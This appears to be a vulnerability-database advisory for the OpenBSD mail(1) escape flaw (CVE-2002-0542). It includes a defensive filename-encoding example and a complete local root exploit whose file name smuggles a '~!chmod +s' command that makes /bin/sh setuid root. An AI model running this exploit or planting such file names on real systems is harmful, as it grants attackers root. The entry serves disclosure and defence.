OpenBSD mail arbitrary command execution vulnerability

Vulnerability ID: 1106669
Vulnerability type: Unknown
Published: 2002-04-11
Updated: 2005-05-02
CVE ID: CVE-2002-0542
CNNVD-ID: CNNVD-200207-025
Platform: OpenBSD
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/21373
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200207-025
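|Vulnerability details
/usr/bin/mail on OpenBSD is a simple mail user agent that can also be used in batch mode, for example when cron jobs send mail to the administrator. It handles the escape sequence (~!command) incorrectly, which allows an attacker to execute arbitrary commands with the privileges of the user running mail. /usr/bin/mail accepts escape sequences even when it runs in non-interactive mode, so when an attacker inserts an escape sequence into the stream passed to the mail command as input, mail interprets it, and the attacker can execute arbitrary commands, or read and write arbitrary files on the system, with the privileges of the user running mail. Because the output of the /etc/daily script run by cron is piped to /usr/bin/mail, a user may obtain root privileges.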
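An added example (not from the advisory, the exploit author, or OpenBSD's own patch) of a check on the reporting side: a script that pipes untrusted file names into mail(1) can encode each name so it can never begin a new line, and can count any lines in its output that start with `~`. The function names and the sample file name are assumptions constructed for this example.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Count lines starting with '~': the lines a mail(1) that honours
 * escapes on piped input would treat as commands. */
size_t count_escape_lines(const char *text)
{
    size_t hits = 0;
    int at_line_start = 1;
    for (; *text != '\0'; text++) {
        if (at_line_start && *text == '~')
            hits++;
        at_line_start = (*text == '\n');
    }
    return hits;
}

/* Copy an untrusted name into out on one line: non-printable bytes (newline
 * included), backslash and a leading '~' become \ooo. 0 on success, -1 if out is too small. */
int encode_name(const char *name, char *out, size_t outlen)
{
    size_t used = 0;
    if (outlen == 0)
        return -1;
    for (; *name != '\0'; name++) {
        unsigned char c = (unsigned char)*name;
        int plain = isprint(c) && c != '\\' && !(c == '~' && used == 0);
        size_t need = plain ? 1 : 4;
        if (used + need + 1 > outlen)
            return -1;
        if (plain)
            out[used] = (char)c;
        else
            snprintf(out + used, outlen - used, "\\%03o", (unsigned)c);
        used += need;
    }
    out[used] = '\0';
    return 0;
}

int main(void)
{
    const char *name = "x\n~!echo marker\n"; /* constructed sample name */
    char safe[64] = "";
    int rc = encode_name(name, safe, sizeof safe);
    printf("raw: %zu escape line(s)\n", count_escape_lines(name));
    printf("encoded (rc=%d) %s: %zu escape line(s)\n", rc, safe, count_escape_lines(safe));
    return 0;
}
```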
|Exploit
/*
source: http://www.securityfocus.com/bid/4495/info

OpenBSD ships with a number of cron jobs configured by default. The tasks are for the purpose of summarizing system information.

The mail(1) utility is used to send the summaries to the root user. This utility supports escaped characters in message text indicating commands to be executed during processing.

If attacker-supplied data can be included in the message text passed to mail(1), commands specified by the attacker may be executed as root. If the attacker embeds the escape sequence followed by an arbitrary command in this data, the commands will be executed as root when the cron task runs. It is possible for an attacker to embed data in filenames, which are included in the emails. 
*/

/*
 * (c) 2002 [email protected]
 *
 * OpenBSD 3.0 (before 08 Apr 2002)
 * /etc/security + /usr/bin/mail local root exploit
 *
 * Run the exploit and wait for /etc/daily executed from crontab.
 * /bin/sh will be suid root next day morning.
 *
 * Credit goes to [email protected] for discovering vulnerability.
 *
 */

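#include <fcntl.h>
#include <unistd.h>

int main(void)
{
        int fd;

        if (chdir("/tmp") == -1)
                return 1;
        /* The file name is a newline, a line starting with the ~! escape, and a closing newline. */
        fd = open("\n~!chmod +s `perl -e 'print \"\\057\\142\\151\\156\\057\\163\\150\"'`\n", O_CREAT|O_WRONLY, 04777);

        /* open() returns -1 on failure, so test for that rather than for non-zero. */
        if (fd != -1)
                close(fd);
        return 0;
}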
|References

Source: BID
Name: 4495
Link: http://www.securityfocus.com/bid/4495
Source: XF
Name: openbsd-mail-root-privileges(8818)
Link: http://www.iss.net/security_center/static/8818.php
Source: BUGTRAQ
Name: 20020411 OpenBSD Local Root Compromise
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=101855467811695&w=2
Source: www.openbsd.org
Link: http://www.openbsd.org/errata30.html#mail
Source: BUGTRAQ
Name: 20020411 local root compromise in openbsd 3.0 and below
Link: http://online.securityfocus.com/archive/1/267089
Source: OSVDB
Name: 5269
Link: http://www.osvdb.org/5269
